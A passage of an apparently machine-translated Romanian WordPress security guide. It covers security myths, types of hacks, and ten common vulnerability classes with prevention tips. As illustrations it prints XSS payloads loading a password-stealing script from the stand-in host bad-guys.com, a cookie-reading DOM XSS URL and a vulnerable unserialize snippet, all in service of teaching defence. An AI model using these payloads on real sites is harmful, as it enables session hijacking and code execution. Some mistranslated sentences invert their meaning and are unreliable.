Securitate WordPress: Ghidul final

Securitatea WordPress poate fi intimidantă, dar nu trebuie să fie. În acest ghid cuprinzător de securitate WordPress, am simplificat elementele de bază ale securizării site-ului dvs. WordPress, astfel încât orice persoană non-tehnică să-și poată înțelege și proteja site-ul împotriva atacurilor hackerilor.

Acest ghid pentru securitatea WordPress este împărțit în 10 secțiuni ușor de digerat. Fiecare secțiune vă va ghida printr-un aspect specific al securității WordPress. Până la sfârșitul ghidului, veți afla diferitele tipuri de vulnerabilități, motivele hackerilor și cum să asigurați totul, de la serverul dvs. la utilizatorii individuali ai site-ului dvs. WordPress.

Hai să ne scufundăm!

Secțiunea 1: WordPress este sigur?

WordPress este sigur? Răspunsul scurt este da.

WordPress are probleme de securitate?

În timp ce WordPress în sine este sigur, evitarea greșelilor de securitate WordPress necesită un pic de efort din partea proprietarilor de site-uri. Adevărul este că cea mai mare problemă de securitate WordPress o reprezintă utilizatorii săi. Majoritatea hacking-urilor WordPress de pe platformă pot fi evitate cu puțin efort de la proprietarii site-ului.

Nu vă faceți griji, vă acoperim. Acest ghid vă va învăța tot ce trebuie să știți despre păstrarea securității site-ului dvs. web.

Înainte de a ne putea securiza site-urile web, trebuie mai întâi să înțelegem cinci lucruri.

1. De ce hackerii atacă site-urile web
2. Diferitele tipuri de hacks WordPress
3. Tipuri specifice de vulnerabilități WordPress
4. Cum să preveniți vulnerabilitățile WordPress
5. Cum se determină severitatea unei vulnerabilități

De ce un hacker mi-ar ataca site-ul web?

Aceasta este o întrebare obișnuită de securitate WordPress pe care s-ar putea să o puneți când cel mai rău coșmar începe să se împlinească. De ce un hacker ar ataca site-ul meu web? Liniștește-te, șansele ca atacul să fie personale nu sunt prea mici. Hackerii au motive de bază care nu au nicio legătură cu conținutul site-ului dvs. web. De obicei, hackerilor nu le pasă dacă site-ul dvs. web este o pagină de caritate pentru puii fără adăpost sau un site cu tone de produse interesante de vânzare.

Cu toate acestea, este greu să nu te simți vizat atunci când o identitate fără chip a intrat pe site-ul tău, provocând haos și frământări. Vă simțiți stresați și, ca și cum situația va ieși din controlul vostru. Te simți atacat personal și te întrebi dacă a existat o modalitate de a opri atacul. S-ar putea chiar să vă întrebați dacă există salvarea resturilor care au fost site-ul dvs. web.

Deci, ce face ca un hacker să vizeze un site web? Nu are nicio legătură cu site-ul dvs., ce subiecte tratează sau ceva de genul acesta. În realitate, hackerii vizează software-ul pe care site-ul dvs. îl folosește pentru a rămâne în funcțiune. Prin piratarea acestui software, pot fura date sensibile ale clienților sau chiar prelua controlul site-ului dvs. WordPress.

Din păcate, odată cu creșterea popularității sale, WordPress a devenit și o țintă pentru hackeri. Dacă un plugin WordPress popular are o vulnerabilitate gravă, un hacker are potențial planurile pentru a prelua sute de mii, dacă nu milioane de site-uri web. Din fericire, majoritatea vulnerabilităților plugin-urilor sunt rapid reparate de dezvoltatorii lor.

Prin posibilitatea de a obține informații sensibile și private, hackerii pot să le vândă pentru un venit sau chiar să dețină răscumpărarea datelor, ceea ce îi face pe oameni să plătească pentru a-și recupera informațiile în mâini sigure.

Deci, care este motivația principală a hackerilor?

Pentru a crea fluxuri de numerar pentru ei înșiși.

Internetul este un loc profitabil care oferă tuturor categoriilor sociale oportunitatea de a genera un salariu. Cu toate acestea, asta nu înseamnă că toată lumea face acest lucru într-un mod legal, moralist. Hackerii obțin profituri mari chiar și din cel mai mic site web.

Banii sunt motivația de care au nevoie, dar unii se bucură de sentimentul de putere pe care îl primesc atunci când încalcă cu succes un site web, dar marea majoritate se ocupă exclusiv de bani.

Secțiunea 2: Cele mai importante 5 mituri de securitate WordPress dezamăgite

Înainte de a intra în restul acestui ghid de securitate WordPress, să luăm un minut pentru a dezbate câteva mituri de securitate WordPress.

Veți găsi o mulțime de sfaturi de securitate WordPress plutind pe internet de la oameni bine intenționați care doresc cu adevărat să vă ajute. Din păcate, unele dintre aceste sfaturi sunt construite pe miturile de securitate WordPress și nu adaugă nici o securitate suplimentară site-ului dvs. WordPress. De fapt, unele „sfaturi” de securitate WordPress pot crește probabilitatea de a vă confrunta cu probleme și conflicte.

Avem din ce în ce mai multe mituri de securitate WordPress, dar ne vom concentra doar pe primele 5 pe care le-am văzut în mod constant în peste 30.000 de bilete de asistență. Aceste conversații cu clienții noștri au fost folosite ca bază pentru următoarele criterii pentru a selecta miturile de securitate WordPress de top:

1. Frecvența mitului a fost menționată.
2. Numărul de dureri de cap provocate de mit.
3. Falsul sentiment de siguranță pe care îl dă mitul.

1. Ar trebui să ascundeți adresa URL / wp-admin sau / wp-login (cunoscută și sub numele de Hide Backend)

Ideea din spatele ascunderii wp-admin este că hackerii nu pot pirata ceea ce nu pot găsi. Dacă adresa URL de autentificare nu este standardul WordPress / wp-admin / URL, nu sunteți protejat de atacurile de forță brută?

Adevărul este că majoritatea funcțiilor Hide Backend sunt pur și simplu securitate prin obscuritate, ceea ce nu este o strategie de securitate WordPress antiglonț. În timp ce ascundeți backend-ul URL wp-admin vă poate ajuta să atenuați unele dintre atacurile asupra autentificării dvs., această abordare nu le va opri pe toate.

Primim frecvent bilete de asistență de la persoane care sunt nedumerite de modul în care iThemes Security Pro raportează încercări de conectare nevalide atunci când acestea și-au ascuns datele de conectare. Asta pentru că există și alte modalități de a vă conecta pe site-urile dvs. WordPress pe lângă utilizarea unui browser, cum ar fi utilizarea XML-RPC sau API-ul REST. Ca să nu mai vorbim, după schimbarea adresei URL de conectare, un alt plugin sau temă ar putea fi conectat în continuare la noua adresă URL.

De fapt, caracteristica Hide Backend nu schimbă nimic. Da, împiedică majoritatea utilizatorilor să acceseze direct adresa URL de autentificare implicită. Dar după ce cineva introduce adresa URL de autentificare personalizată, este redirecționată înapoi la adresa URL de autentificare implicită WordPress.

Personalizarea adresei URL de conectare este, de asemenea, cunoscută pentru a provoca conflicte. Există câteva pluginuri, teme sau aplicații terțe care introduc codul greu wp-login.php în baza lor de coduri. Așadar, atunci când un software codat hard caută yoursite.com/wp-login.php, găsește o eroare.

2. Ar trebui să ascundeți numele temei și numărul versiunii WordPress

Dacă utilizați instrumentele de dezvoltare ale browserului dvs., puteți vedea destul de repede numele temei și numărul versiunii WordPress care rulează pe un site WordPress. Teoria din spatele ascunderii numelui temei și a versiunii WP este că, dacă atacatorii au aceste informații, vor avea planul de a intra în site-ul dvs.

De exemplu, uitându-vă la captura de ecran de mai sus, puteți vedea că acest site folosește Twenty Twenty-One, iar versiunea WordPress este 5.6.

Problema cu acest mit al securității WordPress este că nu există un tip în spatele unei tastaturi care să caute combinația perfectă de temă și numărul versiunii WordPress pentru a ataca. Cu toate acestea, există roboți fără minte care parcurg internetul în căutarea vulnerabilităților cunoscute în codul real care rulează pe site-ul dvs., astfel încât ascunderea numelui temei și a numărului versiunii WP nu vă va proteja.

3. Ar trebui să vă redenumiți directorul wp-content

Directorul wp-content conține pluginurile, temele și folderul de încărcare media. Aceasta este o mulțime de lucruri bune și cod executabil, toate într-un singur director, deci este de înțeles că oamenii vor să fie proactivi și să securizeze acest folder.

Din păcate, este un mit al securității WordPress că schimbarea numelui wp-content va adăuga un strat suplimentar de securitate site-ului. Nu o va face. Putem găsi cu ușurință numele directorului dvs. de conținut wp modificat utilizând instrumentele de dezvoltator ale browserului. În captura de ecran de mai jos putem vedea că am redenumit directorul de conținut al acestui site în / test /.

Schimbarea numelui directorului nu va adăuga niciun fel de securitate site-ului dvs., dar poate provoca conflicte pentru pluginurile care au o cale hardcoded / wp-content / director.

4. Site-ul meu web nu este suficient pentru a atrage atenția hackerilor

Acest mit al securității WordPress lasă o mulțime de site-uri vulnerabile la atac. Chiar dacă sunteți proprietarul unui site mic cu trafic redus, este totuși crucial să fiți proactivi în securizarea site-ului dvs. web.

Chiar dacă sunteți proprietarul unui site mic cu trafic redus, este totuși crucial să fiți proactivi în securizarea site-ului dvs. web.

Adevărul este că site-ul sau afacerea dvs. nu trebuie să fie mari pentru a atrage atenția unui potențial atacator. Hackerii văd în continuare o oportunitate de a utiliza site-ul dvs. ca o conductă pentru a redirecționa unii dintre vizitatorii dvs. către site-uri rău intenționate, pentru a trimite spam de pe serverul dvs. de e-mail, pentru a răspândi viruși sau chiar pentru a extrage Bitcoin. Vor lua orice pot obține.

5. WordPress este o platformă nesigură

Cel mai dăunător mit al securității WordPress este că WordPress în sine este nesigur. Acest lucru pur și simplu nu este adevărat. WordPress este cel mai popular sistem de gestionare a conținutului din lume și nu a reușit așa prin faptul că nu a luat în serios securitatea.

Secțiunea 3: Hacks WordPress și vulnerabilități WordPress

4 tipuri de hack-uri WordPress

Când vine vorba de înțelegerea securității WordPress, este important să înțelegeți

1. Spam SEO

O altă motivație pentru ca un hacker să-ți atace site-ul web este de a obține beneficiile spamului SEO. SEO, sau optimizarea motoarelor de căutare, este ceea ce utilizează motoarele de căutare pentru indexarea sau clasificarea site-ului dvs. web. Utilizând anumite cuvinte cheie, plasate strategic în paginile dvs. de web și în postările de pe blog, puteți ajuta site-ul dvs. să se claseze mai sus în căutările Google. Acest lucru va conduce traficul către site-ul dvs. web și vă poate ajuta să obțineți un profit care merită timpul.

Hackerii știu totul despre SEO și îl folosesc în avantajul lor. Când site-ul dvs. web a fost compromis, hackerii vor instala un backdoor în site-ul dvs. web. Acest lucru le permite să vă controleze cuvintele cheie și conținutul site-ului de la distanță. De multe ori vor redirecționa traficul de pe site-ul dvs. web, direcționându-l direct către al lor, trecând peste al dvs. complet.

Acest lucru vă va lăsa publicul țintă confuz și frustrat, distrugând reputația și credibilitatea site-ului dvs. web. Vizitatorii site-ului dvs. web vor fi adesea redirecționați către site-uri care sunt în mod evident escrocherii și vor ezita să vă revizuiască site-ul în viitor.

De parcă acest lucru nu ar fi suficient de rău, hackerii care folosesc această abordare fac ca site-ul dvs. să arate rău motoarelor de căutare, nu doar semenilor. Site-ul dvs. web nu va mai arăta legitim, iar clasamentul său va cădea rapid. Fără un rang înalt în căutări, site-ul dvs. va deveni unul dintre milioanele care nu obțin niciodată mai mult de câteva accesări pe lună.

2. Injecții malware

Mulți hackeri atacă site-ul dvs., intenționând să-l infecteze cu malware. Programele malware sunt mici bucăți de cod care pot fi utilizate pentru a face modificări rău intenționate pe site-ul dvs. web. Dacă site-ul dvs. este infectat cu programe malware, este important să fiți alertat cât mai curând posibil.

În fiecare minut în care malware-ul rămâne pe site-ul dvs. web, acesta dăunează mai mult site-ului dvs. web. Cu cât se vor face mai multe daune site-ului dvs. web, cu atât vă va dura mai mult să vă curățați și să restaurați site-ul web. Este vital să verificați starea de sănătate a site-ului dvs. web, scanând periodic malware. Acesta este motivul pentru care este esențial să verificați în permanență starea de sănătate a site-ului dvs. web, scanând malware.

3. Ransomware

Un hacker ar putea dori să vă atace site-ul web pentru al păstra ca răscumpărare. Ransomware se referă la momentul în care un hacker preia site-ul dvs. web, nu vă va elibera decât dacă le plătiți o taxă importantă. Timpul mediu de oprire al unui atac ransomware este de 9,5 zile. Cât de mult v-ar costa 10 zile fără vânzări?

Răscumpărarea medie pe care o solicită hackerii a crescut dramatic, de la 294 USD în 2015 la peste 13.000 USD în 2020. Cu aceste tipuri de plăți, afacerea online a criminalității nu încetinește. Devine din ce în ce mai critic să vă protejați și să vă protejați în mod corespunzător site-ul web pe măsură ce crește comunitățile de criminalitate de acest gen.

4. Defacementarea site-ului web

Unii hackeri s-ar putea să vă atace site-ul pentru un pic de distracție. Un stil de hacking care este mai puțin inerent rău este cel al defăcătorilor de site-uri web. Aceștia sunt de obicei copii sau adulți tineri care încep să se joace cu abilitățile lor de hacking. Ei fac astfel de hack-uri ca o modalitate de a-și exersa abilitățile.

Când vorbim despre defectarea unui site web, gândiți-vă la graffiti. Atacatorii vă vor modifica complet aspectul site-ului, uneori în moduri distractive sau nebunești. Defăcătoarele tipice ale site-urilor își fac faptele pentru distracție sau ca o modalitate de a arăta. Ei vor posta adesea imagini cu răutățile lor, încercând să se unească reciproc pentru a câștiga premiul pentru cea mai bună defăimare.

Vestea bună este că această formă de hacking este mai puțin periculoasă pentru tine. În plus, întrucât majoritatea adolescenților și alți hackeri amatori efectuează defăimările, sunt mai ușor de detectat și eliminat de pe site-ul dvs. web în comparație cu alte forme de malware. Ele pot fi de obicei detectate de scanere și eliminate rapid.

21 Vulnerabilități comune WordPress explicate

Din păcate, există vulnerabilități WordPress. Vulnerabilitățile WordPress pot exista în pluginuri, teme și chiar în nucleul WordPress. Și din moment ce WordPress are acum aproape 40% din toate site-urile web, sarcina de a înțelege vulnerabilitățile este și mai importantă. Simplu spus: trebuie să fiți vigilenți cu privire la securitatea site-ului dvs. web.

Dacă nu sunteți un expert în securitate WordPress, înțelegerea tuturor vulnerabilităților WordPress poate fi descurajantă. De asemenea, poate fi copleșitor să încerci să înțelegi diferitele niveluri de severitate ale unei vulnerabilități, împreună cu riscurile vulnerabilității WordPress.

Acest ghid va defini cele mai frecvente 21 de vulnerabilități WordPress, va acoperi modul de evaluare a severității unei vulnerabilități WordPress, va oferi exemple despre modul în care un hacker poate exploata vulnerabilitatea și va arăta cum pot fi prevenite aceste vulnerabilități. Hai să ne scufundăm.

Ce este o vulnerabilitate WordPress?

O vulnerabilitate WordPress este o slăbiciune sau un defect într-o temă, un plugin sau un nucleu WordPress care poate fi exploatat de un hacker. Cu alte cuvinte, vulnerabilitățile WordPress creează un punct de intrare pe care un hacker îl poate folosi pentru a elimina activitatea rău intenționată.

Rețineți că hacking-ul site-ului web este aproape automatizat. Din această cauză, hackerii pot pătrunde cu ușurință într-un număr mare de site-uri web în aproape deloc. Hackerii folosesc instrumente speciale care scanează internetul, căutând vulnerabilități cunoscute.

Hackerilor le plac țintele ușoare și a avea un site web care rulează software cu vulnerabilități cunoscute este ca și cum ați oferi unui hacker instrucțiuni pas cu pas pentru a pătrunde pe site-ul dvs. WordPress, server, computer sau orice alt dispozitiv conectat la internet.

Rapoartele noastre lunare de rezolvare a vulnerabilităților WordPress acoperă toate vulnerabilitățile de bază divulgate public WordPress, pluginul WordPress și tema. În aceste rezumate, împărtășim numele pluginului sau temei vulnerabile, versiunile afectate și tipul de vulnerabilitate.

Ce este Vulnerabilitatea Zero-Day?

Când vine vorba de securitatea WordPress, este important să înțelegem definiția unei vulnerabilități de zi zero. Deoarece vulnerabilitatea a fost dezvăluită publicului, dezvoltatorul are la dispoziție zero zile pentru a remedia vulnerabilitatea. Și acest lucru poate avea implicații mari pentru plugin-uri și teme.

De obicei, un cercetător de securitate va descoperi o vulnerabilitate și va dezvălui în mod privat vulnerabilitatea dezvoltatorilor companiei care dețin software-ul. Cercetătorul de securitate și dezvoltatorul sunt de acord că detaliile complete vor fi publicate odată ce un patch a fost pus la dispoziție. Este posibil să existe o ușoară întârziere în dezvăluirea vulnerabilității după ce patch-ul este lansat, pentru a oferi mai multor oameni timp pentru actualizare pentru vulnerabilități majore de securitate.

Cu toate acestea, dacă un dezvoltator nu răspunde cercetătorului de securitate sau nu reușește să furnizeze un patch pentru vulnerabilitate, atunci cercetătorul poate dezvălui în mod public vulnerabilitatea pentru a pune presiune pe dezvoltator să emită un patch.

Dezvăluirea publică a unei vulnerabilități și introducerea aparentă a unei zile zero pot părea contraproductive. Dar, este singura pârghie pe care o are un cercetător pentru a-l presiona pe dezvoltator să remedieze vulnerabilitatea.

Project Zero de la Google are îndrumări similare atunci când vine vorba de dezvăluirea vulnerabilităților. Ei publică detaliile complete ale vulnerabilității după 90 de zile. Dacă vulnerabilitatea a fost sau nu reparată.

Vulnerabilitatea este acolo pentru ca oricine să o găsească. Dacă un hacker găsește vulnerabilitatea înainte ca dezvoltatorul să lanseze un patch, acesta devine cel mai rău coșmar al utilizatorului final…. O zi zero exploatată activ.

Ce este o vulnerabilitate de zi zero exploatată activ?

O vulnerabilitate de zi zero exploatată activ este exact cum sună. Este o vulnerabilitate neperfectată pe care hackerii o vizează, o atacă și o exploatează activ.

La sfârșitul anului 2018, hackerii exploatau în mod activ o vulnerabilitate gravă WordPress în pluginul WP GDPR Compliance. Exploatarea a permis utilizatorilor neautorizați - mai multe detalii despre acest lucru în secțiunea următoare - să modifice setările de înregistrare a utilizatorului WP și să schimbe rolul implicit de utilizator nou dintr-un abonat în administrator.

Acești hackeri au descoperit această vulnerabilitate înainte de pluginul WP GDPR Compliance și cercetătorii de securitate. Deci, orice site web care avea pluginul instalat era un semn ușor și garantat pentru infractorii cibernetici.

Cum să vă protejați de o vulnerabilitate zero-day

Cel mai bun mod de a vă proteja site-ul web împotriva unei vulnerabilități Zero-Day este să dezactivați și să eliminați software-ul până când vulnerabilitatea este reparată. Din fericire, dezvoltatorii de pluginuri WP GDPR Compliance au acționat rapid și au lansat un patch pentru vulnerabilitate a doua zi după ce a fost dezvăluită public.

Vulnerabilitățile neperfectate fac din site-ul dvs. o țintă ușoară pentru hackeri.

Vulnerabilități WordPress neautentificate vs.

Există încă doi termeni cu care trebuie să fii familiarizat atunci când vorbești despre vulnerabilitățile WordPress.

1. Neautentificat - O vulnerabilitate WordPress neautentificată înseamnă că oricine poate exploata vulnerabilitatea.
2. Autentificat - O vulnerabilitate WordPress autentificată înseamnă că necesită exploatarea unui utilizator conectat.

O vulnerabilitate care necesită un utilizator autentificat este mult mai greu de exploatat de un hacker, mai ales dacă necesită privilegii la nivel de administrator. Și, dacă un hacker are deja mâinile pe un set de acreditări de administrator, nu trebuie să exploateze o vulnerabilitate pentru a face ravagii.

Există o singură avertisment. Unele vulnerabilități autentificate necesită abilități de exploatare la nivel de abonați. Dacă site-ul dvs. permite oricui să se înregistreze, nu există prea multe diferențe între aceasta și o vulnerabilitate neautentificată.

Când vine vorba de vulnerabilitățile WordPress, există 21 de tipuri comune de vulnerabilități. Să acoperim fiecare dintre aceste tipuri de vulnerabilități WordPress.

1. Bypass de autentificare

O vulnerabilitate de Bypass de autentificare permite unui atacator să omită cerințele de autentificare și să îndeplinească sarcini rezervate în mod normal utilizatorilor autentificați.

Autentificarea este procesul de verificare a identității unui utilizator. WordPress cere utilizatorilor să introducă un nume de utilizator și o parolă pentru a-și verifica identitatea.

Exemplu de ocolire a autentificării

Aplicațiile verifică autentificarea pe baza unui set fix de parametri. Un atacator ar putea modifica acești parametri pentru a obține acces la paginile web care necesită de obicei autentificare.

Un exemplu foarte simplu de așa ceva este un parametru de autentificare în adresa URL.

 https:/my-website/some-plugint?param=authenticated&param=no

Adresa URL de mai sus are un parametru de autentificare care are o valoare de nr. Deci, atunci când vizităm această pagină, ni se va prezenta un mesaj care ne informează că nu suntem autorizați să vizualizăm informațiile de pe această pagină.

Cu toate acestea, dacă verificarea autentificării a fost slab codificată, un atacator ar putea modifica parametrul de autentificare pentru a obține acces la pagina privată.

 https:/my-website/some-plugint?param=authenticated&param=yes

În acest exemplu, un hacker ar putea modifica valoarea de autentificare în adresa URL la da pentru a ocoli cerința de autentificare pentru a vizualiza pagina.

Cum să preveniți prevenirea ocolirii autentificării

Vă puteți ajuta să vă protejați site-ul împotriva vulnerabilităților de autentificare întreruptă utilizând autentificarea cu doi factori.

2. Vulnerabilitatea Backdoor

O vulnerabilitate Backdoor permite utilizatorilor autorizați și neautorizați să ocolească măsurile normale de securitate WordPress și să obțină acces la nivel înalt la un computer, server, site web sau aplicație.

Exemplu Backdoor

Un dezvoltator creează un backdoor astfel încât să poată comuta rapid între codificare și testare a codului ca utilizator de administrator. Din păcate, dezvoltatorul uită să elimine portiera din spate înainte ca software-ul să fie lansat publicului.

Dacă un hacker găsește backdoor-ul, acesta poate exploata punctul de intrare pentru a obține acces de administrator la software. Acum, când hackerul are acces de administrator, ei pot face tot felul de lucruri rău intenționate, cum ar fi injectarea de programe malware sau furtul de date sensibile.

Cum se previne un backdoor

O mulțime de uși din spate pot fi reduse la o singură problemă, configurarea greșită a securității. Problemele de configurare greșită ale securității WordPress pot fi atenuate prin eliminarea oricăror funcții neutilizate din cod, menținerea tuturor bibliotecilor la zi și prin generalizarea mesajelor de eroare.

3. Vulnerabilitate la injectarea obiectelor PHP

O vulnerabilitate PHP Object-Injection apare cu un utilizator care trimite o intrare care nu este igienizată (ceea ce înseamnă că caracterele ilegale nu sunt eliminate) înainte de a fi trecut la funcția PHP unserialized() .

Exemplu de injecție de obiecte PHP

Iată un exemplu din lumea reală a unei vulnerabilități PHP Object-Injection din pluginul Sample Ads Manager WordPress care a fost raportat inițial de sumofpwn.

Problema se datorează a două apeluri nesigure pentru unserialize () în fișierul plugin sam-ajax-loader.php urilor sam-ajax-loader.php . Intrarea este preluată direct din solicitarea POST așa cum se poate vedea în codul de mai jos.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Această problemă ar putea duce la introducerea și executarea unui cod rău intenționat de către un atacator.

Cum să preveniți injectarea obiectelor PHP

Nu utilizați funcția unserialize() cu intrarea furnizată de utilizator, utilizați în schimb funcțiile JSON.

4. Vulnerabilitate a scripturilor între site-uri

O vulnerabilitate XSS sau Cross-Site Scripting apare atunci când o aplicație web permite utilizatorilor să adauge cod personalizat în calea URL. Un atacator poate exploata vulnerabilitatea pentru a rula codul rău intenționat în browserul web al victimei, poate crea o redirecționare către un site web rău intenționat sau poate deturna o sesiune de utilizator.

Există trei tipuri principale de XSS, reflectate. stocate și bazate pe DOM

5. Vulnerabilitatea reflectată a scripturilor între site-uri

Un XSS reflectat sau un script încrucișat reflectat apare atunci când un script rău intenționat este trimis într-o cerere de client - o cerere făcută de dvs. într-un browser - către un server și este reflectată de server și executată de browserul dvs.

Exemplu de scripturi cross-site reflectat

Să presupunem că yourfavesite.com necesită să fiți conectat pentru a vizualiza o parte din conținutul site-ului web. Și să presupunem că acest site web nu reușește să codeze corect intrările utilizatorilor.

Un atacator ar putea profita de această vulnerabilitate prin crearea unui link rău intenționat și yourfavesite.com acestuia cu utilizatorii yourfavesite.com în e-mailuri și postări pe rețelele de socializare.

Atacatorul folosește un instrument de scurtare a adreselor URL pentru a face ca link-ul rău intenționat să pară yourfavesite.com/cool-stuff și foarte yourfavesite.com/cool-stuff , yourfavesite.com/cool-stuff . Dar, când faceți clic pe linkul scurtat, linkul complet este executat de browserul dvs. yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

După ce faceți clic pe link, veți fi direcționat către yourfavesite.com , iar scriptul rău intenționat va fi reflectat înapoi în browser, permițând atacatorului să vă deturneze cookie-urile de sesiune și contul yourfavesite.com .

Cum să preveniți scripturile inter-site reflectate

Regula nr. 5 din foaia de trucuri OWASP pentru prevenirea cross-scriptingului este codarea URL-ului înainte de a insera date neacredibile în valorile parametrilor URL-ului HTML. Această regulă poate ajuta la prevenirea creării unei vulnerabilități XSS reflectate atunci când se adaugă date de încredere în valoarea parametrului HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Vulnerabilitate stocată pe mai multe site-uri

O vulnerabilitate stocată XSS sau stocată pe site-uri de tip cross-site permite hackerilor să injecteze cod rău intenționat și să-l stocheze pe serverul unei aplicații web.

Exemplu de scripturi între site-uri stocate

Un atacator descoperă că yourfavesite.com permite vizitatorilor să încorporeze etichete HTML în secțiunea de comentarii a site-ului. Deci atacatorul creează un nou comentariu:

Super articol! Consultați acest alt articol legat de <script src=”http://bad-guys.com/passwordstealingcode.js> . </script>

Notă: o vulnerabilitate XSS reflectată ar necesita ca un vizitator să facă clic pe linkul codului rău intenționat pentru a-l executa. Un atac XSS stocat necesită doar ca pagina care conține comentariul să fie vizitată. Codul rău intenționat rulează la fiecare încărcare a paginii.

Acum că tipul nostru rău a adăugat comentariul, fiecare viitor vizitator al acestei pagini va fi expus scriptului său rău intenționat. Scriptul este găzduit pe site-ul răului și are capacitatea de a deturna vizitatorii cookie-urile de sesiune și conturile yourfavesite.com .

Cum să preveniți crearea de scripturi între site-uri stocate

Regula nr. 1 din foaia de trucuri OWASP pentru prevenirea cross-scriptingului este codarea HTML înainte de a adăuga date de încredere în elemente HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Codificarea următoarelor caractere pentru a preveni trecerea la orice context de execuție, cum ar fi script, stil sau gestionare de evenimente. Utilizarea entităților hexagonale este recomandată în spec.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Vulnerabilitate bazată pe model de obiecte de documente pe site-uri de tip cross-site

O vulnerabilitate XSS bazată pe DOM sau pe un model de obiect de document, bazată pe scripturi între site-uri, apare atunci când scriptul de pe site-ul client al unui site web scrie date furnizate de utilizator în Document Object Model (DOM). Site-ul web citește apoi datele utilizatorului din DOM și îl trimite în browserul web al vizitatorului.

Dacă datele furnizate de utilizator nu sunt tratate corect, un atacator ar putea injecta cod rău intenționat care ar fi executat atunci când site-ul web citește codul din DOM.

Notă: XSS reflectat și stocat sunt probleme la nivel de server, în timp ce XSS bazat pe DOM este o problemă client (browser).

Exemplu de scripturi între site-uri bazate pe model de obiecte de document

Un mod obișnuit de a explica un atac DOM XSS o pagină de întâmpinare personalizată. După crearea unui cont, să presupunem că yourfavesite.com sunteți redirecționat către o pagină de întâmpinare personalizată pentru a vă întâmpina după nume folosind codul de mai jos. Și numele de utilizator este codat în adresa URL.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

Așadar, am avea o adresă URL a yourfavesite.com/account?name=yourname .

Un atacator ar putea realiza un atac XSS bazat pe DOM, trimițând următoarea adresă URL noului utilizator:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Când noul utilizator face clic pe link, browserul său trimite o cerere pentru:

 /account?name=<script>alert(document.cookie)</script>

la bad-guys.com . Site-ul web răspunde cu pagina care conține codul Javascript de mai sus.

Browserul noului utilizator creează un obiect DOM pentru pagină, în care obiectul document.location conține șirul:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

Codul original din pagină nu se așteaptă ca parametrul implicit să conțină marcaj HTML, făcând ecou marcajului pe pagină. Apoi, browserul noului utilizator va reda pagina și va executa scriptul atacatorului:

 alert(document.cookie)

Cum să preveniți crearea de scripturi cross-site bazate pe DOM

Regula nr. 1 pe foaia de trucuri de prevenire a scripturilor pe site-uri încrucișate pe OWASP este de a scăpa HTML. Apoi, JS scapă înainte de a adăuga date de încredere în subcontextul HTML în contextul de execuție.

Exemple de metode HTML periculoase:

Atribute

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

Metode

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

Pentru a face actualizări dinamice la HTML în siguranța DOM, OWASP recomandă:

1. Codificare HTML și apoi
2. Codificare JavaScript pentru toate intrările de încredere, așa cum se arată în aceste exemple:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Vulnerabilitate de falsificare a cererii între site-uri

O vulnerabilitate CSRF sau Cross-Site Request Forgery apare atunci când un criminal cibernetic păcălește un utilizator să efectueze acțiuni neintenționate. Atacatorul falsifică cererea utilizatorului către o aplicație.

Exemplu de solicitare de falsificare inter-site

În pachetul nostru de vulnerabilități WordPress din ianuarie 2020, am raportat vulnerabilitatea de falsificare a cererii între site-uri, găsită în pluginul Fragmente de cod. (Pluginul a fost repetat în versiunea 2.14.0)

Lipsa protecției CRSF a pluginului a permis oricui să falsifice o cerere în numele unui administrator și să injecteze cod executabil pe un site vulnerabil. Un atacator ar fi putut profita de această vulnerabilitate pentru a executa coduri rău intenționate și chiar pentru a efectua o preluare completă a site-ului.

Cum să preveniți falsificarea cererilor între site-uri

Majoritatea cadrelor de codare au apărări simbolice sincronizate încorporate pentru a proteja împotriva CSRF și ar trebui utilizate.

Există, de asemenea, componente externe, cum ar fi CSRF Protector Project, care pot fi utilizate pentru a proteja vulnerabilitățile CSRF PHP și Apache.

9. Vulnerabilitate de falsificare a cererii din partea serverului

O vulnerabilitate SSRF sau Server-Site Request Forger permite unui atacator să păcălească o aplicație de pe server pentru a face cereri HTTP către un domeniu arbitrar la alegere.

Exemplu de solicitare de fals în partea de server

O vulnerabilitate SSRF ar putea fi exploatată pentru a declanșa un atac Reflected Cross-Site Scripting. Un atacator poate prelua un script rău intenționat de la bad-guys.com și îl poate trimite tuturor vizitatorilor site-ului.

Cum să preveniți falsificarea cererii de la server

Primul pas pentru a atenua vulnerabilitățile SSRF este validarea intrărilor. De exemplu, dacă serverul dvs. se bazează pe adresele URL furnizate de utilizator pentru a prelua fișiere diferite, ar trebui să validați adresa URL și să permiteți doar gazdele țintă în care aveți încredere.

Pentru mai multe informații despre prevenirea SSRF, consultați foaia de trucuri OWASP.

10. Vulnerabilitatea escaladării privilegiilor

O vulnerabilitate a escaladei de privilegii permite unui atacator să execute sarcini care necesită în mod normal privilegii de nivel superior.

Exemplu de escaladare a privilegiilor

În buletinul nostru de vulnerabilități WordPress din noiembrie 2020, am raportat o vulnerabilitate de escaladare a privilegiilor găsită în pluginul Ultimate Member (Vulnerabilitatea a fost corecționată în versiunea 2.1.12).

